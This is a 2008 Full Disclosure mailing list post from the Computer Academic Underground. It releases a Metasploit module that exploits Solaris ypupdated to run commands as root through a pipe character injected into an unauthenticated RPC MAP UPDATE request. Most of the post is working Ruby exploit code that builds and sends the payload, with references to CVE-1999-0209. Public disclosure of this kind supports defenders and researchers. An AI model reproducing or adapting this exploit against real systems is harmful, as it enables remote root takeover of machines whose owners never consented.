Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

CAU-EX-2008-0001: Solaris ypupdated Command Execution
From: "I)ruid" <druid () caughq org>
Date: Fri, 04 Apr 2008 20:39:37 -0500

                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                     
                    Computer Academic Underground
                        http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2008-0001
Release Date:   2008.04.04
Title:          ypupdated_exec.rb
Description:    Solaris ypupdated Command Execution
Tested:         Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes:     Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email:   I)ruid <druid (@) caughq.org>
===============/========================================================

Description
===========

This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request.  Extra
commands may be launched through this command shell, which runs as root
on the remote host, by passing commands in the format '|<command>'.


Credits
=======

Josh D. <mcpheea () cadvision com> from Avalon Security Research is
credited with originally discovering this vulnerability.

This Metasploit exploit module was modeled after kcope's exploit
released to Milw0rm on 2008.03.20.


References
==========

http://osvdb.org/displayvuln.php?osvdb_id=11517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209
http://www.securityfocus.com/bid/1749/info
http://www.milw0rm.com/exploits/5282


Metasploit
==========

require 'msf/core'

module Msf

class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote

        include Exploit::Remote::SunRPC

        def initialize(info = {})
                super(update_info(info, 
                        'Name'           => 'Solaris ypupdated Command Execution',
                        'Description'    => %q{
                                This exploit targets a weakness in the way the ypupdated RPC
                                application uses the command shell when handling a MAP UPDATE
                                request.  Extra commands may be launched through this command
                                shell, which runs as root on the remote host, by passing
                                commands in the format '|<command>'.

                                Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
                                ypupdated is started with the '-i' command-line option.
                        },
                        'Author'         => [ 'I)ruid <druid () caughq org>' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 4498 $',
                        'References'     =>
                                [
                                        ['BID', '1749'],
                                        ['CVE', '1999-0209'],
                                        ['OSVDB', '11517'],
                                ],
                        'Privileged'     => true,
                        'Platform'       => ['unix', 'solaris'],
                        'Arch'           => ARCH_CMD,
                        'Payload'        =>
                                {
                                        'Space'    => 1024,
                                        'DisableNops' => true,
                                },
                        'Targets'        => [ ['Automatic', { }], ],
                        'DefaultTarget' => 0
                ))

                register_options(
                        [
                                OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
                                OptInt.new('GID', [false, 'GID to emulate', 0]),
                                OptInt.new('UID', [false, 'UID to emulate', 0])
                        ], self.class
                )
        end

        def exploit
                hostname  = datastore['HOSTNAME']
                program   = 100028
                progver   = 1
                procedure = 1

                print_status 'Sending PortMap request for ypupdated program'
                pport = sunrpc_create('udp', program, progver)

                print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
                print_status 'Waiting for response...'
                sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
                command = '|' + payload.encoded
                msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
                sunrpc_call(procedure, msg)

                sunrpc_destroy

                print_good 'No Errors, appears to have succeeded!'
        rescue ::Rex::Proto::SunRPC::RPCTimeout
                print_status 'Warning: ' + $!
                print_status 'Exploit may or may not have succeeded.'
        end

end
end     


-- 
I)ruid, CĀ²ISSP
druid () caughq org
http://druid.caughq.org

Attachment: ypupdated_exec.rb
Description:

Attachment: signature.asc
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • CAU-EX-2008-0001: Solaris ypupdated Command Execution I)ruid (Apr 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault